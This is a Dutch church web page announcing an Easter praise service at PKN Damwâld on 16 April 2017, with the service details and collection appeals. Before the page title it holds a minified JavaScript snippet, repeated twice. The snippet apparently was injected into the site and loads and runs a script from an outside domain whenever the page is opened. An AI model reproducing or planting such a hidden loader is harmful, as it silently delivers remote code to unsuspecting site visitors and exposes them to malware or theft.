;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Peaskepraise - PKN Damwâld
zondag 16 april 2017
19:30 uur
m.m.v. gospelband Lifenote

Peaskepraise

Zondag 16 april, eerste paasdag is er weer een Peaskepraise. Het thema is: The Passion continues ……. Daar waar we (hopelijk) genoten hebben van The Passion in Leeuwarden gaat het verhaal van Pasen verder. Het is heel goed om stil te staan bij het lijden en sterven van Jezus, maar hij is ook opgestaan. En dat feit, wat heeft dat ons te zeggen in een wereld die nog steeds lijdt, veraf onder honger en oorlog, en dichtbij in ons eigen ziekte of verdriet. Wat is in onze wereld de boodschap van God? Daarover spreekt Johan Eisma. De toepasselijke muzieknummers worden gespeeld door Lifenote. Kortom een avond die je niet wil missen. Dus kom allen en neem je vrienden mee naar De Ontmoeting Foarwei 48 in Damwald. De dienst begint om 19.30, deuren open vanaf 19.00. Vol = vol.

Informatie

Voorganger:Johan Eisma
Mededeling:m.m.v. gospelband Lifenote
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: JOP

Weten jongeren nog wat we vieren in de Kerk met Pasen? Als hen de vraag wordt gesteld, antwoorden ze: Met Pasen werd hij toch geboren in een kribbe? Of nee... ging hij toen niet dood? Of het blijft angstvallig stil. Nelleke is catecheet en werkt bij JOP, Jeugdorganisatie van de Protestantse Kerk. In deze weken voor Pasen merkt zij hoe weinig jongeren nog weten van het Paasfeest. Nelleke helpt daarom kerken om de betekenis van Pasen opnieuw uit te leggen aan deze jongeren. Als catecheet weet ze hoe jongeren die niets meer weten van geloven opeens geraakt kunnen worden als ze de kracht van het Paasverhaal wél ontdekken. Als opeens doordringt dat de liefde echt sterker is dan de dood, is dat een doorbraak waar iedereen enthousiast van wordt. JOP gelooft dat jongeren het recht hebben om de kracht van Pasen te ontdekken en te horen van een God die hen liefheeft en er voor hen wil zijn. Daar zet JOP zich voor in met het ontwikkelen van een nieuwe catechesemethode, materialen en trainingen. Helpt u mee?

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris